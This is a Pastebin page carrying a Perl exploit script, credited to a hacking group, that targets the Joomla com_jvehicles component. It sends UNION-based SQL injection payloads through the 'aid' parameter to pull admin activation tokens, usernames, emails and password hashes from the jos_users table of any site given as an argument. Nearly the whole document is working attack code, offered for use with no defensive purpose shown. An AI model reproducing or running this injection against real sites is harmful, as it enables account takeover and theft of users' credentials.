Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use IO::Socket::INET;
- use LWP::UserAgent;
- system("clear");
- print "------------------------------------------------------------------------\n";
- print "########################################################################\n";
- print "# Joomla com_jvehicles Exploit #\n";
- print "# *Coded by Mauritania Attacker* #\n";
- print "# Greetz: AnonGhost - Mauritania HaCker Team - ZHC #\n";
- print "########################################################################\n";
- print "------------------------------------------------------------------------\n\n";
- $target = $ARGV[0];
- $component = $ARGV[1];
- if($target eq '' || $component eq '')
- {
- print "Usage: ./exploit.pl <target> <Method Number> \n";
- print "-----------------------------------\n";
- print " Available Methods : \n";
- print " 1- Get Activation Token Admin \n";
- print " 2- Get User + Password + Email \n";
- print "-----------------------------------\n";
- print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
- exit(1);
- }
- open(FILE, "> contents11.txt");
- if($target !~ /http:\/\//)
- {
- $target = "http://$target";
- }
- sleep 1.5;
- $agent = LWP::UserAgent->new();
- $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
- if($component == 1)
- {
- $host = $target . "index.php?option=com_jvehicles&task=agentlisting&aid=62/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(activation,0x3a), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
- print " . . Retrieving Activation Token Admin .. from $target . . \n\n";
- sleep 1;
- $req = $agent->request(HTTP::Request->new(GET=>$host));
- $content = $req->content;
- if($content =~ /([0-9a-fA-F]{32})/)
- {
- $password = $1;
- print "[+] Activation Token Admin found --> $password :) .\n\n";
- sleep 1;
- }
- else
- {
- print "[-] Activation Token Admin not found :( . \n\n";
- }
- }
- if($component == 2)
- {
- $host = $target . "index.php?option=com_jvehicles&task=agentlisting&aid=62/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(username,0x3a,email,password), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
- print " . . Retrieving Datas... from $target . . \n\n";
- sleep 1;
- $req = $agent->request(HTTP::Request->new(GET=>$host));
- $content = $req->content;
- if($content =~ /([0-9a-fA-F]{32})/)
- {
- $password = $1;
- print "[+] Datas Found ^_^ --> $password :) .\n\n";
- sleep 1;
- }
- else
- {
- print "[-] Datas not found :( . \n\n";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement